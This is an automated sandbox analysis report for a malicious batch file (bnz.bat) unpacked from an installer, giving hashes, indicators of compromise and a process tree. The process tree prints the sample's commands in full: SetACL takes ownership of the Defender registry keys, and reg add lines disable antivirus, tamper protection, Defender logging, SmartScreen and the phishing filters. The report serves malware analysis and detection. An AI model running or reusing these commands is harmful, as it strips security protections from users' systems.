Overview
overview
10Static
static
71310121612...52.exe
windows7-x64
101310121612...52.exe
windows10-2004-x64
10$PLUGINSDI...el.dll
windows7-x64
7$PLUGINSDI...el.dll
windows10-2004-x64
7$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$_63_/PowerRun64.exe
windows7-x64
4$_63_/PowerRun64.exe
windows10-2004-x64
3$_63_/SetACL64.exe
windows7-x64
1$_63_/SetACL64.exe
windows10-2004-x64
1$_63_/acxx...gr.exe
windows7-x64
3$_63_/acxx...gr.exe
windows10-2004-x64
3$_63_/bn.bat
windows7-x64
1$_63_/bn.bat
windows10-2004-x64
1$_63_/bn1.bat
windows7-x64
10$_63_/bn1.bat
windows10-2004-x64
10$_63_/bnn.bat
windows7-x64
1$_63_/bnn.bat
windows10-2004-x64
1$_63_/bnoo1.bat
windows7-x64
10$_63_/bnoo1.bat
windows10-2004-x64
10$_63_/bnz.bat
windows7-x64
1$_63_/bnz.bat
windows10-2004-x64
1$_63_/dotN...up.exe
windows7-x64
7$_63_/dotN...up.exe
windows10-2004-x64
7$_63_/dotN...up.exe
windows7-x64
7$_63_/dotN...up.exe
windows10-2004-x64
7$_63_/win_...rp.exe
windows7-x64
3$_63_/win_...rp.exe
windows10-2004-x64
3Analysis
-
max time kernel
94s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
05-12-2024 02:08
Behavioral task
behavioral1
Sample
13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral2
Sample
13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral3
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral4
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral7
Sample
$_63_/PowerRun64.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral8
Sample
$_63_/PowerRun64.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral9
Sample
$_63_/SetACL64.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral10
Sample
$_63_/SetACL64.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral11
Sample
$_63_/acxxtzcogvgr.exe
Resource
win7-20240729-en
windows7-x64
Behavioral task
behavioral12
Sample
$_63_/acxxtzcogvgr.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral13
Sample
$_63_/bn.bat
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral14
Sample
$_63_/bn.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral15
Sample
$_63_/bn1.bat
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral16
Sample
$_63_/bn1.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral17
Sample
$_63_/bnn.bat
Resource
win7-20241010-en
windows7-x64
Behavioral task
behavioral18
Sample
$_63_/bnn.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral19
Sample
$_63_/bnoo1.bat
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral20
Sample
$_63_/bnoo1.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral21
Sample
$_63_/bnz.bat
Resource
win7-20240708-en
windows7-x64
Behavioral task
behavioral22
Sample
$_63_/bnz.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral23
Sample
$_63_/dotNetFx40_Full_setup.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral24
Sample
$_63_/dotNetFx40_Full_setup.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral25
Sample
$_63_/dotNetFx45_Full_setup.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral26
Sample
$_63_/dotNetFx45_Full_setup.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral27
Sample
$_63_/win_version_csharp.exe
Resource
win7-20240729-en
windows7-x64
Behavioral task
behavioral28
Sample
$_63_/win_version_csharp.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
General
-
Target
$_63_/bnz.bat
-
Size
2KB
-
MD5
a639b0bfefec4e4032cffe1a11e7c28a
-
SHA1
0247f009b3310e486a04ddc68c9123e184285407
-
SHA256
1cb11eaa7973052f97f53e33e65be14e9c17aaa95e8f43d20cc42f89db96f78b
-
SHA512
46b0a53cacfd9204884f50221fe2dd7e5607cf2abc16cfa4bc6edb076dc55228a07885bb511f475668a459895fd89407b1fd2a963fdfd764bd50b4bb92c04306
Malware Config
Signatures
-
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeBackupPrivilege 4164 SetACL64.exe Token: SeRestorePrivilege 4164 SetACL64.exe Token: SeTakeOwnershipPrivilege 4164 SetACL64.exe Token: SeBackupPrivilege 4392 SetACL64.exe Token: SeRestorePrivilege 4392 SetACL64.exe Token: SeTakeOwnershipPrivilege 4392 SetACL64.exe Token: SeBackupPrivilege 3868 SetACL64.exe Token: SeRestorePrivilege 3868 SetACL64.exe Token: SeTakeOwnershipPrivilege 3868 SetACL64.exe Token: SeBackupPrivilege 4848 SetACL64.exe Token: SeRestorePrivilege 4848 SetACL64.exe Token: SeTakeOwnershipPrivilege 4848 SetACL64.exe Token: SeBackupPrivilege 2376 SetACL64.exe Token: SeRestorePrivilege 2376 SetACL64.exe Token: SeTakeOwnershipPrivilege 2376 SetACL64.exe Token: SeBackupPrivilege 2096 SetACL64.exe Token: SeRestorePrivilege 2096 SetACL64.exe Token: SeTakeOwnershipPrivilege 2096 SetACL64.exe Token: SeBackupPrivilege 1516 SetACL64.exe Token: SeRestorePrivilege 1516 SetACL64.exe Token: SeTakeOwnershipPrivilege 1516 SetACL64.exe -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 4456 wrote to memory of 4164 4456 cmd.exe 84 PID 4456 wrote to memory of 4164 4456 cmd.exe 84 PID 4456 wrote to memory of 4392 4456 cmd.exe 85 PID 4456 wrote to memory of 4392 4456 cmd.exe 85 PID 4456 wrote to memory of 3868 4456 cmd.exe 86 PID 4456 wrote to memory of 3868 4456 cmd.exe 86 PID 4456 wrote to memory of 4848 4456 cmd.exe 87 PID 4456 wrote to memory of 4848 4456 cmd.exe 87 PID 4456 wrote to memory of 2376 4456 cmd.exe 88 PID 4456 wrote to memory of 2376 4456 cmd.exe 88 PID 4456 wrote to memory of 2096 4456 cmd.exe 89 PID 4456 wrote to memory of 2096 4456 cmd.exe 89 PID 4456 wrote to memory of 1516 4456 cmd.exe 90 PID 4456 wrote to memory of 1516 4456 cmd.exe 90 PID 4456 wrote to memory of 4016 4456 cmd.exe 91 PID 4456 wrote to memory of 4016 4456 cmd.exe 91 PID 4456 wrote to memory of 2928 4456 cmd.exe 92 PID 4456 wrote to memory of 2928 4456 cmd.exe 92 PID 4456 wrote to memory of 2916 4456 cmd.exe 93 PID 4456 wrote to memory of 2916 4456 cmd.exe 93 PID 4456 wrote to memory of 1944 4456 cmd.exe 94 PID 4456 wrote to memory of 1944 4456 cmd.exe 94 PID 4456 wrote to memory of 1820 4456 cmd.exe 95 PID 4456 wrote to memory of 1820 4456 cmd.exe 95 PID 4456 wrote to memory of 2316 4456 cmd.exe 96 PID 4456 wrote to memory of 2316 4456 cmd.exe 96 PID 4456 wrote to memory of 3028 4456 cmd.exe 97 PID 4456 wrote to memory of 3028 4456 cmd.exe 97 PID 4456 wrote to memory of 872 4456 cmd.exe 98 PID 4456 wrote to memory of 872 4456 cmd.exe 98 PID 4456 wrote to memory of 4896 4456 cmd.exe 99 PID 4456 wrote to memory of 4896 4456 cmd.exe 99 PID 4456 wrote to memory of 3844 4456 cmd.exe 100 PID 4456 wrote to memory of 3844 4456 cmd.exe 100 PID 4456 wrote to memory of 1272 4456 cmd.exe 101 PID 4456 wrote to memory of 1272 4456 cmd.exe 101 PID 4456 wrote to memory of 2272 4456 cmd.exe 102 PID 4456 wrote to memory of 2272 4456 cmd.exe 102 PID 4456 wrote to memory of 2424 4456 cmd.exe 103 PID 4456 wrote to memory of 2424 4456 cmd.exe 103
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$_63_\bnz.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Users\Admin\AppData\Local\Temp\$_63_\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4164
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3868
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f2⤵PID:4016
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f2⤵PID:2928
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f2⤵PID:2916
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f2⤵PID:1944
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f2⤵PID:1820
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f2⤵PID:2316
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f2⤵PID:3028
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f2⤵PID:872
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f2⤵PID:4896
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f2⤵PID:3844
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f2⤵PID:1272
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f2⤵PID:2272
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f2⤵PID:2424
-